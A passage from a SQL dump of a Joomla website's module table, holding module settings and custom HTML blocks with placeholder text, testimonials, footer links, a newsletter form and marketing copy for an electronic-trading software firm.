00:00:00',1,'mod_xpertaccordion',1,1,'{\"content_source\":\"joomla\",\"count\":\"3\",\"intro\":1,\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"theme\":\"faq\",\"load_jquery\":1,\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\",\"moduleclass_sfx\":\"\",\"jomcatfilter\":1,\"jom_catid\":[\"79\"],\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\"}',0,'*'),(249,0,'What We Don\'t','','',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_xpertaccordion',1,1,'{\"content_source\":\"joomla\",\"count\":\"3\",\"intro\":1,\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"theme\":\"basic\",\"load_jquery\":1,\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\",\"moduleclass_sfx\":\"\",\"jomcatfilter\":1,\"jom_catid\":[\"79\"],\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\"}',0,'*'),(250,0,'Where we are','','',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_xpertaccordion',1,1,'{\"content_source\":\"joomla\",\"count\":\"3\",\"intro\":1,\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"theme\":\"line\",\"load_jquery\":1,\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\",\"moduleclass_sfx\":\"\",\"jomcatfilter\":0,\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\"}',0,'*'),(254,0,'Client Says - Rounded','','<div class=\"width-50\">\n <img src=\"images/pages/team/img3.jpg\" alt=\"\" />\n <blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit.\n <h3>Customer, Company</h3>\n \n </blockquote>\n \n</div>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"testimonial testimonial-rounded\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(255,0,'Client Says - Boxed','','<div class=\"width-50\">\n <img src=\"images/pages/team/img3.jpg\" alt=\"\" />\n <blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit.\n <h3>Customer, Company</h3>\n \n </blockquote>\n \n</div>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"testimonial\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(256,0,'Client Says - Normal','','<div class=\"clearfix width-50\">\n<img class=\"pull-left\" src=\"/zenith2/images/pages/team/img3.jpg\" alt=\"\">\n<p class=\"testimonial-text\"> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit\n<span class=\"pull-right\">CEO, RackSpace</span>\n</p>\n</div>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"testimonial\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(257,0,'Client Says - Rounded','','<div class=\"clearfix testimonial-rounded width-50\">\n <p class=\"testimonial-text\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit.\n </p>\n <img class=\"pull-left\" src=\"images/pages/team/img3.jpg\" alt=\"\" />\n <div class=\"client-info pull-left\">\n <h4>John Doe</h4>\n <h5>RackSpace Cloud Inc.</h5>\n </div>\n <div class=\"testimonial-arrow\"></div>\n</div>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"testimonial\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(258,0,'CountDown','','<div>\r\n <div id=\"clock\"></div>\r\n</div>',1,'maintop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(260,0,'Service & Features','','<div class=\"service-intro clearfix block\">\n<div class=\"grid3\"><h1>Our Services</h1></div>\n<div class=\"grid8\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled</p></div>\n \n</div>\n\n\n<div class=\"width-33\" data-uk-scrollspy=\"{cls:\'animation-scale-up\', delay: 300}\">\n <div class=\"block\">\n <h3 class=\"title\"><i class=\"icon-cogs\"></i>Easy Customization</h3>\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\n </div>\n</div>\n\n<div class=\"width-33\" data-uk-scrollspy=\"{cls:\'animation-scale-up\', delay: 600}\">\n <div class=\"block\">\n <h3 class=\"title\"><i class=\"icon-desktop\"></i>Responsive Layout</h3>\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\n </div>\n</div>\n\n<div class=\"width-33\" data-uk-scrollspy=\"{cls:\'animation-scale-up\', delay: 900}\">\n <div class=\"block\">\n <h3 class=\"title\"><i class=\"icon-bar-chart\"></i>SEO Friendly</h3>\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\n </div>\n</div>',1,'header-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"service nomargin-bottom nopadding-bottom\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(262,0,'Powerful Expose Framework','','<div class=\"width-50\">\r\n<div class=\"f1-texts\">\r\n<h1>BUILT WITH EXPOSE FRAMEWORK</h1>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.\r\n</p>\r\n<p><a class=\"btn btn-border\" href=\"#\">Buy Now</a></p>\r\n</div></div>\r\n\r\n<div class=\"width-50\" data-uk-scrollspy=\"{cls:\'animation-slide-right\'}\">\r\n<img src=\"images/demo-contents/expose-admin.png\" alt=\"\" />\r\n</div>\r\n',1,'feature-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"all-features feature-one\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(264,0,'Twitter Bootstrapped','','<div class=\"width-50\" data-uk-scrollspy=\"{cls:\'animation-slide-bottom\'}\">\n<i class=\"icon-twitter\"></i></div>\n\n<div class=\"width-50 f2-texts\">\n <h1>TWITTER BOOTSTRAP BASED</h1>\n <p>\n It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters. \n </p>\n</div>\n',1,'maintop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"all-features feature-two\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(265,0,'All Cutting Edge Features','','<div class=\"width-50\">\r\n<div class=\"f3-texts\">\r\n<h1>ALL CUTTING EDGE FEATURES</h1>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.\r\n</p>\r\n<a class=\"btn btn-border\" href=\"#\">Buy Now</a>\r\n</div></div>\r\n\r\n<div class=\"width-50\" data-uk-scrollspy=\"{cls:\'animation-slide-right\'}\">\r\n<img src=\"images/demo-contents/boost-mockup.png\" alt=\"\" />\r\n</div>\r\n',1,'mainbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"all-features feature-three\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(266,0,'Other Services','','',1,'bottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_xperttabs',1,0,'{\"content_source\":\"joomla\",\"count\":\"5\",\"tabs_position\":\"top\",\"tabs_interaction\":\"click\",\"tabs_title_type\":\"content\",\"tabs_title_custom\":\"Tab Title1, Tab Title2, Tab Title3\",\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"readmore\":\"0\",\"readmore_label\":\"Read More\",\"routing_type\":\"default\",\"menuitemid\":\"435\",\"mod_style\":\"0\",\"transition\":\"fade-slide\",\"jomcatfilter\":1,\"jom_catid\":[\"80\"],\"jom_ordering\":\"c_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\",\"moduleclass_sfx\":\"icon-cogs\",\"auto_module_id\":1,\"module_unique_id\":\"xs_1\",\"load_jquery\":\"1\",\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\"}',0,'*'),(267,245,'Useful Links','','<ul>\r\n<li><a href=\"index.php\">HOME</a></li>\r\n<li><a href=\"index.php/about-us\">About us</a></li>\r\n<li><a href=\"index.php/clients1\">CLIENTS</a></li>\r\n<li><a href=\"index.php/partners\">partners</a></li>\r\n<li><a href=\"index.php/contact-page\">Contacts</a></li>\r\n<li><a href=\"https://www.fitoman.com/fitss/default.aspx\" target=\"_blank\">SUPPORT</a></li>\r\n</ul>',1,'copyright-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"pull-right footer-links\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(268,0,'Resouces','','<ul>\r\n <li><a href=\"#\">Easy Social</a></li>\r\n <li><a href=\"#\">Easy Blog</a></li>\r\n <li><a href=\"#\">Contact</a></li>\r\n <li><a href=\"#\">FAQ</a></li>\r\n <li><a href=\"#\">Company Profile</a></li>\r\n</ul>',1,'footer-3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"no-style\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(269,0,'Get In Touch','','<p><i class=\"icon-mobile-phone\"></i> (212) 555 55 00</p>\r\n\r\n<p><i class=\"icon-envelope\"></i> Email: sales@yourwebsite.com</p>\r\n\r\n<p><i class=\"icon-map-marker\"></i> Street nr 100, 4536534, Chicago, US</p>\r\n',1,'footer-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(270,236,'Hero Area','','<h1>Welcome to First Information Technology</h1>',1,'header-1',736,'2015-03-12 08:58:48','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"hero-area align-center\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(271,239,'Services','','',1,'utility-1',736,'2015-03-15 07:08:22','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_xperttabs',1,0,'{\"content_source\":\"module\",\"count\":\"3\",\"tabs_position\":\"bottom\",\"tabs_interaction\":\"click\",\"tabs_title_type\":\"content\",\"tabs_title_custom\":\"Tab Title1, Tab Title2, Tab Title3\",\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"readmore\":\"0\",\"readmore_label\":\"Read More\",\"routing_type\":\"default\",\"menuitemid\":\"435\",\"mod_style\":\"0\",\"transition\":\"fade-slide\",\"faicon\":\"icon-cogs, icon-code, icon-desktop\",\"jomcatfilter\":1,\"jom_catid\":[\"79\"],\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":0,\"k2_catid\":\"\",\"k2_get_children\":1,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\",\"modules\":[\"281\",\"282\"],\"moduleclass_sfx\":\"nomargin-bottom nopadding-bottom services\",\"auto_module_id\":1,\"module_unique_id\":\"xs_1\",\"load_jquery\":\"1\",\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(272,254,'Stunning Website within Minitues || Design, Functionality and Communication','','<div class=\"width-50\">\r\n<div class=\"feature-item-text\">\r\n<h4>Flexible Layout System</h4>\r\n<p>I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents & exellence</p>\r\n</div>\r\n</div>\r\n<div class=\"width-50\">\r\n<div class=\"feature-item-text\">\r\n<h4>SEO Optimized</h4>\r\n<p>I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents & exellence</p>\r\n</div>\r\n</div>\r\n<div class=\"width-50\">\r\n<div class=\"feature-item-text\">\r\n<h4>LESS Support</h4>\r\n<p>I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents & exellence</p>\r\n</div>\r\n</div>\r\n<div class=\"width-50\">\r\n<div class=\"feature-item-text\">\r\n<h4>Mega & Offcanvas Menu</h4>\r\n<p>I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents & exellence</p>\r\n</div>\r\n</div>\r\n<p><img src=\"images/demo-contents/devices.png\" alt=\"\" /></p>\r\n<div class=\"clearfix\"> </div>',1,'feature-1',736,'2015-03-15 06:55:09','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"bigmargin-top key-features nomargin-bottom nopadding-bottom align-center\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(273,0,'Portfolio','','<p></p>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(274,0,'Client Testimonials || Lorem Ipsum is simply dummy text of the printing and typesetting industry','','<div class=\"clearfix width-50\">\r\n<img class=\"pull-left\" src=\"/zenith2/images/pages/team/img2.jpg\" alt=\"\">\r\n<h4><i class=\"icon-user\"></i> Shamim Choudhury<i class=\"icon-briefcase\"></i>ThemeXpert</h4>\r\n<p class=\"testimonial-text\"> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit\r\n</p>\r\n</div>\r\n\r\n\r\n<div class=\"clearfix width-50\">\r\n<img class=\"pull-left\" src=\"/zenith2/images/pages/team/img3.jpg\" alt=\"\">\r\n<h4><i class=\"icon-user\"></i>Scarlett Dale<i class=\"icon-briefcase\"></i>ThemesGrove</h4>\r\n<p class=\"testimonial-text\"> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla quam velit, vulputate eu pharetra nec, mattis ac neque. Duis vulputate commodo lectus, ac blandit elit\r\n</p>\r\n</div>\r\n\r\n',1,'mainbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"testimonial align-center bigmargin-top\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(275,235,'Email Subscription Form','','<h1>Liked Zenith II?</h1>\r\n<h2>Submit Your Email and Recieve Download Link via Email</h2>\r\n<form action=\"https://app.getresponse.com/add_contact_webform.html\" method=\"post\"><input name=\"webform_id\" type=\"hidden\" value=\"2716305\" />\r\n<div class=\"input-append\"><input id=\"form\" class=\"width-40\" name=\"email\" type=\"text\" placeholder=\"youremail@domain.com\" /> <input class=\"btn btn-success\" type=\"submit\" value=\"Send Me Now!\" /></div>\r\n</form>',1,'maintop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center call-to-action\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(276,0,'Code','','<div class=\"align-center\">\n<h1>Never sold online before? It’s easy.</h1>\n<h2>Shopify is perfect for beginners and experts a like.</h2>\n</div>\n<div class=\"width-50\">\n <img src=\"images/demo-contents/boost-mockup.png\" alt=\"\" />\n</div>\n<div class=\"width-50\">\n<h3>You don\'t need to have any technical or design experience to easily create a beautiful online store.</h3>\n<p>\nSimply choose a stylish ecommerce website design, easily customize your online store, add products, and you\'re pretty much ready to accept payments. Got a question? Simply ask your very own Support Guru and they\'ll be happy to help! \n\nWhether you already have products, are looking to sell digital goods or are interested in drop shipping — Shopify has a complete solution for you.\n</p>\n</div>',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(277,0,'Design','','<div class=\"align-center\">\r\n<h1>Never sold online before? It’s easy.</h1>\r\n<h2>Shopify is perfect for beginners and experts a like.</h2>\r\n</div>\r\n<div class=\"width-60\">\r\n <img src=\"images/demo-contents/boost-mockup.png\" alt=\"\" />\r\n</div>\r\n<div class=\"width-40\">\r\n<h3>You don\'t need to have any technical or design experience to easily create a beautiful online store.</h3>\r\n<p>\r\nSimply choose a stylish ecommerce website design, easily customize your online store, add products, and you\'re pretty much ready to accept payments. Got a question? Simply ask your very own Support Guru and they\'ll be happy to help! \r\n\r\nWhether you already have products, are looking to sell digital goods or are interested in drop shipping — Shopify has a complete solution for you.\r\n</p>\r\n</div>',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(279,0,'Code','','<div class=\"align-center\">\r\n<h1>Never sold online before? It’s easy.</h1>\r\n<h2>Shopify is perfect for beginners and experts a like.</h2>\r\n</div>\r\n<div class=\"width-50\">\r\n <img src=\"images/demo-contents/expose-admin.png\" alt=\"\" />\r\n</div>\r\n<div class=\"width-50\">\r\n<h3>You don\'t need to have any technical or design experience to easily create a beautiful online store.</h3>\r\n<p>\r\nSimply choose a stylish ecommerce website design, easily customize your online store, add products, and you\'re pretty much ready to accept payments. Got a question? Simply ask your very own Support Guru and they\'ll be happy to help! \r\n\r\nWhether you already have products, are looking to sell digital goods or are interested in drop shipping — Shopify has a complete solution for you.\r\n</p>\r\n</div>',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(280,241,'Clean Admin Panel','','<div class=\"align-center\">\r\n<h1>Made With You In Mind</h1>\r\n<h2>Perfect working experience created without added any complexity</h2>\r\n<p style=\"text-align: left; padding-left: 30px;\"><img style=\"float: left;\" src=\"images/2011-08-12T161254Z_01_ACAE77B191N00_RTROPTP_2_OEGBS-STCKS-EUROPE-MZ7.JPG\" alt=\"\" width=\"532\" height=\"304\" /></p>\r\n</div>\r\n<div class=\"width-50\" style=\"padding-left: 30px;\">\r\n<h3 style=\"text-align: left; padding-left: 60px;\">Highly customizable admin interface provide rich toolset to customize website look and feel</h3>\r\n<p style=\"text-align: left; padding-left: 30px;\">Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth.</p>\r\n</div>',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(281,242,'Future of Electronic Trading','','<div class=\"align-center\">\r\n<h1>The future of Electronic Trading</h1>\r\n<h1> in the Financial Markets</h1>\r\n</div>\r\n<div class=\"width-50\">\r\n<h3>The possibility TO ACHIEVE success for Financial Markets Investors.</h3>\r\n<h3>Building Blocks for On-Line Trading Solutions.</h3>\r\n</div>\r\n<div class=\"width-50\"><img src=\"images//2011-08-12T161254Z_01_ACAE77B191N00_RTROPTP_2_OEGBS-STCKS-EUROPE-MZ7.JPG\" alt=\"\" width=\"513\" height=\"304\" /></div>',1,'',736,'2015-03-15 07:18:09','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(282,255,'100% automation','','<div class=\"align-center\">\r\n<h1>100% automation of day to day </h1>\r\n<h1>Brokerage operations</h1>\r\n</div>\r\n<div class=\"width-50\"><img src=\"images/MSM1.jpg\" alt=\"\" /></div>\r\n<div class=\"width-50\">\r\n<h3>Bringing the Stock Markets together </h3>\r\n<h3>Fully Integrated Solutions</h3>\r\n<p> </p>\r\n</div>',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(283,0,'About Us','','Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book',1,'footer-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(284,238,'Sample Of Our Clients','','',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_xpertgallery',1,1,'{\"content_source\":\"joomla\",\"count\":\"50\",\"column\":\"4\",\"sort_enabled\":0,\"sort_elements\":[\"date\",\"random\"],\"overview\":0,\"overview_elements\":[\"title\",\"intro\"],\"intro\":0,\"intro_limit_type\":\"words\",\"intro_limit\":\"30\",\"image_resize\":1,\"image_width\":\"480\",\"image_height\":\"350\",\"jomcatfilter\":1,\"jom_catid\":[\"82\",\"84\"],\"jom_ordering\":\"c_dsc\",\"jom_user_id\":\"not_me\",\"jom_show_featured\":\"0\",\"k2_catfilter\":1,\"k2_catid\":\"\",\"k2_get_children\":0,\"k2_items_ordering\":\"\",\"k2_featured_items\":\"0\",\"k2_popularity_range\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"bigmargin-top align-center nomargin-left nomargin-right nopadding-left nopadding-right nopadding-bottom portfolio\",\"auto_module_id\":0,\"module_unique_id\":\"xs_1\",\"load_jquery\":1,\"jquery_source\":\"local\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(285,240,'Meet The Team || Lorem Ipsum is simply dummy text of the printing and typesetting industry','Meet the team for homepage','<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img4.jpg\" alt=\"\" />\r\n<h3>Wayne Rooney</h3>\r\n<h4>CTO</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img5.jpg\" alt=\"\" />\r\n<h3>Zlatan Ibrahimović</h3>\r\n<h4>Front End Engineer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div 